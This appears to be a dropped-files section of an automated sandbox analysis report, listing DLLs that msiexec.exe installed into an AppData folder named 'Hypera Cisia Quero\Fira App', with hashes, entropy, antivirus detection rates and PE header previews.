File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12232
Entropy (8bit):	6.577869728469469
Encrypted:	false
SSDEEP:	192:5t6DjZlTIWYhWsWWFYg7VWQ4eW4MtkR/BVrqnajc:5t6Dll0WYhWMqkRLlA
MD5:	3A4B6B36470BAD66621542F6D0D153AB
SHA1:	5005454BA8E13BAC64189C7A8416ECC1E3834DC6
SHA-256:	2E981EE04F35C0E0B7C58282B70DCC9FC0318F20F900607DAE7A0D40B36E80AF
SHA-512:	84B00167ABE67F6B58341045012723EF4839C1DFC0D8F7242370C4AD9FABBE4FEEFE73F9C6F7953EAE30422E0E743DC62503A0E8F7449E11C5820F2DFCA89294
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......M.....`.........................................`................ ...................!..............T............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-interlocked-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11712
Entropy (8bit):	6.6496318655699795
Encrypted:	false
SSDEEP:	192:nWYhWNWWFYg7VWQ4uWtGDlR/BVrqnajcU8:nWYhWLJDlRLlAU8
MD5:	A038716D7BBD490378B26642C0C18E94
SHA1:	29CD67219B65339B637A1716A78221915CEB4370
SHA-256:	B02324C49DD039FA889B4647331AA9AC65E5ADC0CC06B26F9F086E2654FF9F08
SHA-512:	43CB12D715DDA4DCDB131D99127417A71A16E4491BC2D5723F63A1C6DFABE578553BC9DC8CF8EFFAE4A6BE3E65422EC82079396E9A4D766BF91681BDBD7837B1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...*............." .........................................................0......-.....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-libraryloader-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12736
Entropy (8bit):	6.587452239016064
Encrypted:	false
SSDEEP:	192:FvuBL3BBLZWYhWxWWFYg7VWQ4uW4g0jrQYcunYqnajv9Ml:FvuBL3BPWYhWv8jYulhMl
MD5:	D75144FCB3897425A855A270331E38C9
SHA1:	132C9ADE61D574AA318E835EB78C4CCCDDEFDEA2
SHA-256:	08484ED55E43584068C337281E2C577CF984BB504871B3156DE11C7CC1EEC38F
SHA-512:	295A6699529D6B173F686C9BBB412F38D646C66AAB329EAC4C36713FDD32A3728B9C929F9DCADDE562F625FB80BC79026A52772141AD2080A0C9797305ADFF2E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d......c.........." .........................................................0......V`....`.........................................`................ ...................!..............T............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14280
Entropy (8bit):	6.658205945107734
Encrypted:	false
SSDEEP:	384:NOMw3zdp3bwjGzue9/0jCRrndbwNWYhW6WAulh2:NOMwBprwjGzue9/0jCRrndbw5D
MD5:	8ACB83D102DABD9A5017A94239A2B0C6
SHA1:	9B43A40A7B498E02F96107E1524FE2F4112D36AE
SHA-256:	059CB23FDCF4D80B92E3DA29E9EF4C322EDF6FBA9A1837978FD983E9BDFC7413
SHA-512:	B7ECF60E20098EA509B76B1CC308A954A6EDE8D836BF709790CE7D4BD1B85B84CF5F3AEDF55AF225D2D21FBD3065D01AA201DAE6C131B8E1E3AA80ED6FC910A4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......._....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12224
Entropy (8bit):	6.621310788423453
Encrypted:	false
SSDEEP:	96:qo1aCFEWYhWwp/DEs39DHDs35FrsvYgmr0DD0ADEs3TDL2L4m2grMWaLNpDEs3OC:teWYhWVWWFYg7VWQ4yWwAKZRqnajl6x7
MD5:	808F1CB8F155E871A33D85510A360E9E
SHA1:	C6251ABFF887789F1F4FC6B9D85705788379D149
SHA-256:	DADBD2204B015E81F94C537AC7A36CD39F82D7C366C193062210C7288BAA19E3
SHA-512:	441F36CA196E1C773FADF17A0F64C2BBDC6AF22B8756A4A576E6B8469B4267E942571A0AE81F4B2230B8DE55702F2E1260E8D0AFD5447F2EA52F467F4CAA9BC6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...f092.........." .........................................................0............`.........................................`...l............ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11720
Entropy (8bit):	6.7263193693903345
Encrypted:	false
SSDEEP:	192:cWYhWZSWWFYg7VWQ4eWkcc7ZqnajgnLSp:cWYhW84cllk2p
MD5:	CFF476BB11CC50C41D8D3BF5183D07EC
SHA1:	71E0036364FD49E3E535093E665F15E05A3BDE8F
SHA-256:	B57E70798AF248F91C8C46A3F3B2952EFFAE92CA8EF9640C952467BC6726F363
SHA-512:	7A87E4EE08169E9390D0DFE607E9A220DC7963F9B4C2CDC2F8C33D706E90DC405FBEE00DDC4943794FB502D9882B21FAAE3486BC66B97348121AE665AE58B01C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d.....%..........." .........................................................0......[.....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12744
Entropy (8bit):	6.601327134572443
Encrypted:	false
SSDEEP:	192:qKWYhWbWWFYg7VWQ4eWYoWjxceXqnajLJe:qKWYhWJ4WjmAlnJe
MD5:	F43286B695326FC0C20704F0EEBFDEA6
SHA1:	3E0189D2A1968D7F54E721B1C8949487EF11B871
SHA-256:	AA415DB99828F30A396CBD4E53C94096DB89756C88A19D8564F0EED0674ADD43
SHA-512:	6EAD35348477A08F48A9DEB94D26DA5F4E4683E36F0A46117B078311235C8B9B40C17259C2671A90D1A210F73BF94C9C063404280AC5DD5C7F9971470BEAF8B7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0.......Z....`.........................................`...H............ ...................!..............T............................................................................rdata..x...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14272
Entropy (8bit):	6.519411559704781
Encrypted:	false
SSDEEP:	192:AWXk1JzX9cKSIvWYhWLWWFYg7VWQ4SWW0uI7oinEqnajxMyqY:AWXk1JzNcKSIvWYhW5+uOEle6
MD5:	E173F3AB46096482C4361378F6DCB261
SHA1:	7922932D87D3E32CE708F071C02FB86D33562530
SHA-256:	C9A686030E073975009F993485D362CC31C7F79B683DEF713E667D13E9605A14
SHA-512:	3AAFEFD8A9D7B0C869D0C49E0C23086115FD550B7DC5C75A5B8A8620AD37F36A4C24D2BF269043D81A7448C351FF56CB518EC4E151960D4F6BD655C38AFF547F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...j............." .........................................................0......%C....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12232
Entropy (8bit):	6.659079053710614
Encrypted:	false
SSDEEP:	192:NtxDfIeA6WYhW7WWFYg7VWQ4eWpB5ABzR/BVrqnajcb:NtxDfIeA6WYhWp28RLlA
MD5:	9C9B50B204FCB84265810EF1F3C5D70A
SHA1:	0913AB720BD692ABCDB18A2609DF6A7F85D96DB3
SHA-256:	25A99BDF8BF4D16077DC30DD9FFEF7BB5A2CEAF9AFCEE7CF52AD408355239D40
SHA-512:	EA2D22234E587AD9FA255D9F57907CC14327EAD917FDEDE8B0A38516E7C7A08C4172349C8A7479EC55D1976A37E520628006F5C362F6A3EC76EC87978C4469CD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......6y....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11200
Entropy (8bit):	6.7627840671368835
Encrypted:	false
SSDEEP:	192:clIHyZ36WYhWulWWFYg7VWQ4yWqeQDbLtsQlmqnajlDC:clIHyZKWYhWKhlbp6l9C
MD5:	0233F97324AAAA048F705D999244BC71
SHA1:	5427D57D0354A103D4BB8B655C31E3189192FC6A
SHA-256:	42F4E84073CF876BBAB9DD42FD87124A4BA10BB0B59D2C3031CB2B2DA7140594
SHA-512:	8339F3C0D824204B541AECBD5AD0D72B35EAF6717C3F547E0FD945656BCB2D52E9BD645E14893B3F599ED8F2DE6D3BCBEBF3B23ED43203599AF7AFA5A4000311
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....f............" .........................................................0.......>....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12224
Entropy (8bit):	6.590253878523919
Encrypted:	false
SSDEEP:	192:4GeVvXK9WYhW1WWFYg7VWQ4yWj6k50IsQlmqnajlDl:4GeVy9WYhWzVk6l9l
MD5:	E1BA66696901CF9B456559861F92786E
SHA1:	D28266C7EDE971DC875360EB1F5EA8571693603E
SHA-256:	02D987EBA4A65509A2DF8ED5DD0B1A0578966E624FCF5806614ECE88A817499F
SHA-512:	08638A0DD0FB6125F4AB56E35D707655F48AE1AA609004329A0E25C13D2E71CB3EDB319726F10B8F6D70A99F1E0848B229A37A9AB5427BFEE69CD890EDFB89D2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...._............" .........................................................0.......S....`.........................................`................ ...................!..............T............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11720
Entropy (8bit):	6.672720452347989
Encrypted:	false
SSDEEP:	192:byMvQWYhW5fWWFYg7VWQ4eWio3gDwcunYqnajv9JS:byMvQWYhW/BXwulhw
MD5:	7A15B909B6B11A3BE6458604B2FF6F5E
SHA1:	0FEB824D22B6BEEB97BCE58225688CB84AC809C7
SHA-256:	9447218CC4AB1A2C012629AAAE8D1C8A428A99184B011BCC766792AF5891E234
SHA-512:	D01DD566FF906AAD2379A46516E6D060855558C3027CE3B991056244A8EDD09CE29EACEC5EE70CEEA326DED7FC2683AE04C87F0E189EBA0E1D38C06685B743C9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d.....<.........." .........................................................0.......g....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-synch-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13760
Entropy (8bit):	6.575688560984027
Encrypted:	false
SSDEEP:	192:L1dv3V0dfpkXc2MAvVaoKKDWYhWTJWWFYg7VWQ4uWoSUtpwBqnajrmaaGWpmJ:Zdv3V0dfpkXc0vVaeWYhWj/qlQGWpmJ
MD5:	6C3FCD71A6A1A39EAB3E5C2FD72172CD
SHA1:	15B55097E54028D1466E46FEBCA1DBB8DBEFEA4F
SHA-256:	A31A15BED26232A178BA7ECB8C8AA9487C3287BB7909952FC06ED0D2C795DB26
SHA-512:	EF1C14965E5974754CC6A9B94A4FA5107E89966CB2E584CE71BBBDD2D9DC0C0536CCC9D488C06FA828D3627206E7D9CC8065C45C6FB0C9121962CCBECB063D4F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d......c.........." .........................................................0............`.........................................`...X............ ...................!..............T............................................................................rdata..\|...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12232
Entropy (8bit):	6.70261983917014
Encrypted:	false
SSDEEP:	192:ztZ3XWYhW3WWFYg7VWQ4eWNnpit7ZqnajgnLSl:ztZ3XWYhWVg+llk2
MD5:	D175430EFF058838CEE2E334951F6C9C
SHA1:	7F17FBDCEF12042D215828C1D6675E483A4C62B1
SHA-256:	1C72AC404781A9986D8EDEB0EE5DD39D2C27CE505683CA3324C0ECCD6193610A
SHA-512:	6076086082E3E824309BA2C178E95570A34ECE6F2339BE500B8B0A51F0F316B39A4C8D70898C4D50F89F3F43D65C5EBBEC3094A47D91677399802F327287D43B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................0......G.....`.........................................`...x............ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12744
Entropy (8bit):	6.599515320379107
Encrypted:	false
SSDEEP:	192:fKIMFFyWYhW6WWFYg7VWQ4eWoVjxceXqnajLJ4:fcyWYhWKRjmAlnJ4
MD5:	9D43B5E3C7C529425EDF1183511C29E4
SHA1:	07CE4B878C25B2D9D1C48C462F1623AE3821FCEF
SHA-256:	19C78EF5BA470C5B295DDDEE9244CBD07D0368C5743B02A16D375BFB494D3328
SHA-512:	C8A1C581C3E465EFBC3FF06F4636A749B99358CA899E362EA04B3706EAD021C69AE9EA0EFC1115EAE6BBD9CF6723E22518E9BEC21F27DDAAFA3CF18B3A0034A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...r............" .........................................................0............`.........................................`...H............ ...................!..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12232
Entropy (8bit):	6.690164913578267
Encrypted:	false
SSDEEP:	192:4EWYhWdWWFYg7VWQ4eWvvJ6jxceXqnajLJn:4EWYhWbwYjmAlnJ
MD5:	43E1AE2E432EB99AA4427BB68F8826BB
SHA1:	EEE1747B3ADE5A9B985467512215CAF7E0D4CB9B
SHA-256:	3D798B9C345A507E142E8DACD7FB6C17528CC1453ABFEF2FFA9710D2FA9E032C
SHA-512:	40EC0482F668BDE71AEB4520A0709D3E84F093062BFBD05285E2CC09B19B7492CB96CDD6056281C213AB0560F87BD485EE4D2AEEFA0B285D2D005634C1F3AF0B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....Y$..........." .........................................................0.......d....`.........................................`...H............ ...................!..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11720
Entropy (8bit):	6.615761482304143
Encrypted:	false
SSDEEP:	192:dZ89WYhWFWWFYg7VWQ4eW5QLyFqnajziMOci:dZ89WYhWDnolniMOP
MD5:	735636096B86B761DA49EF26A1C7F779
SHA1:	E51FFBDDBF63DDE1B216DCCC753AD810E91ABC58
SHA-256:	5EB724C51EECBA9AC7B8A53861A1D029BF2E6C62251D00F61AC7E2A5F813AAA3
SHA-512:	3D5110F0E5244A58F426FBB72E17444D571141515611E65330ECFEABDCC57AD3A89A1A8B2DC573DA6192212FB65C478D335A86678A883A1A1B68FF88ED624659
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......Xc....`.........................................`...<............ ...................!..............T............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12744
Entropy (8bit):	6.627282858694643
Encrypted:	false
SSDEEP:	192:R0WYhWRWWFYg7VWQ4eWLeNxUUtpwBqnajrmaaG:R0WYhWPzjqlQG
MD5:	031DC390780AC08F498E82A5604EF1EB
SHA1:	CF23D59674286D3DC7A3B10CD8689490F583F15F
SHA-256:	B119ADAD588EBCA7F9C88628010D47D68BF6E7DC6050B7E4B787559F131F5EDE
SHA-512:	1468AD9E313E184B5C88FFD79A17C7D458D5603722620B500DBA06E5B831037CD1DD198C8CE2721C3260AB376582F5791958763910E77AA718449B6622D023C7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d..../}..........." .........................................................0......a.....`.........................................0................ ...................!..............T............................................................................rdata.. ...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15816
Entropy (8bit):	6.435326465651674
Encrypted:	false
SSDEEP:	192:JM0wd8dc9cydWYhWyWWFYg7VWQ4eW9jTXfH098uXqnajH/VCf:G0wd8xydWYhWi2bXuXlTV2
MD5:	285DCD72D73559678CFD3ED39F81DDAD
SHA1:	DF22928E43EA6A9A41C1B2B5BFCAB5BA58D2A83A
SHA-256:	6C008BE766C44BF968C9E91CDDC5B472110BEFFEE3106A99532E68C605C78D44
SHA-512:	84EF0A843798FD6BD6246E1D40924BE42550D3EF239DAB6DB4D423B142FA8F691C6F0603687901F1C52898554BF4F48D18D3AEBD47DE935560CDE4906798C39A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...x............." .........................................................@.......5....`.........................................0................0...................!..............T............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12232
Entropy (8bit):	6.5874576656353145
Encrypted:	false
SSDEEP:	192:6KNMWYhW6WWFYg7VWQ4eWSA5lJSdqnajeMh3:6KNMWYhWKiKdlaW
MD5:	5CCE7A5ED4C2EBAF9243B324F6618C0E
SHA1:	FDB5954EE91583A5A4CBB0054FB8B3BF6235EED3
SHA-256:	AA3E3E99964D7F9B89F288DBE30FF18CBC960EE5ADD533EC1B8326FE63787AA3
SHA-512:	FC85A3BE23621145B8DC067290BD66416B6B1566001A799975BF99F0F526935E41A2C8861625E7CFB8539CA0621ED9F46343C04B6C41DB812F58412BE9C8A0DE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...g P..........." .........................................................0............`.........................................0..."............ ...................!..............T............................................................................rdata..R...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13768
Entropy (8bit):	6.645869978118917
Encrypted:	false
SSDEEP:	192:CGnWlC0i5ClWYhWwWWFYg7VWQ4eWtOUtpwBqnajrmaaGN4P:9nWm5ClWYhWQ8qlQGN6
MD5:	41FBBB054AF69F0141E8FC7480D7F122
SHA1:	3613A572B462845D6478A92A94769885DA0843AF
SHA-256:	974AF1F1A38C02869073B4E7EC4B2A47A6CE8339FA62C549DA6B20668DE6798C
SHA-512:	97FB0A19227887D55905C2D622FBF5451921567F145BE7855F72909EB3027F48A57D8C4D76E98305121B1B0CC1F5F2667EF6109C59A83EA1B3E266934B2EB33C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...r..x.........." .........................................................0.......(....`.........................................0................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\avcodec-60.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	37333152
Entropy (8bit):	6.632921864082428
Encrypted:	false
SSDEEP:	393216:LzyCmQCOCLheXbl4MEf+Eidgrpj3xO6FLzq2KHplhrX5:L5WLheXbl4MEf+HgrpjVF6PD5
MD5:	32F56F3E644C4AC8C258022C93E62765
SHA1:	06DFF5904EBBF69551DFA9F92E6CC2FFA9679BA1
SHA-256:	85AF2FB4836145098423E08218AC381110A6519CB559FF6FC7648BA310704315
SHA-512:	CAE2B9E40FF71DDAF76A346C20028867439B5726A16AE1AD5E38E804253DFCF6ED0741095A619D0999728D953F2C375329E86B8DE4A0FCE55A8CDC13946D5AD8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........(........&"...&............P........................................P.......3:...`... ......................................`...........A.....p.......t...X.9.H'.......M..............................(......................P............................text...............................`..`.rodata.0........................... ..`.data...............................@....rdata....X......X.................@..@.pdata..t...........................@..@.xdata..`...........................@..@.bss...................................edata.......`.......\|..............@..@.idata...A.......B..................@....CRT....`..........................@....tls...............................@....rsrc...p..........................@....reloc...M.......N..................@..B........................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\avformat-60.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5100112
Entropy (8bit):	6.374242928276845
Encrypted:	false
SSDEEP:	49152:WBUp8DPNkkup6GAx9HEekwEfG/66xcPiw+UgAnBM+sVf9d3PWKOyz/Omlc69kXOV:WB/Z16w8idUgfT0b6LnBSpytGyodUl
MD5:	01589E66D46ABCD9ACB739DA4B542CE4
SHA1:	6BF1BD142DF68FA39EF26E2CAE82450FED03ECB6
SHA-256:	9BB4A5F453DA85ACD26C35969C049592A71A7EF3060BFA4EB698361F2EDB37A3
SHA-512:	0527AF5C1E7A5017E223B3CC0343ED5D42EC236D53ECA30D6DECCEB2945AF0C1FBF8C7CE367E87BC10FCD54A77F5801A0D4112F783C3B7E829B2F40897AF8379
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
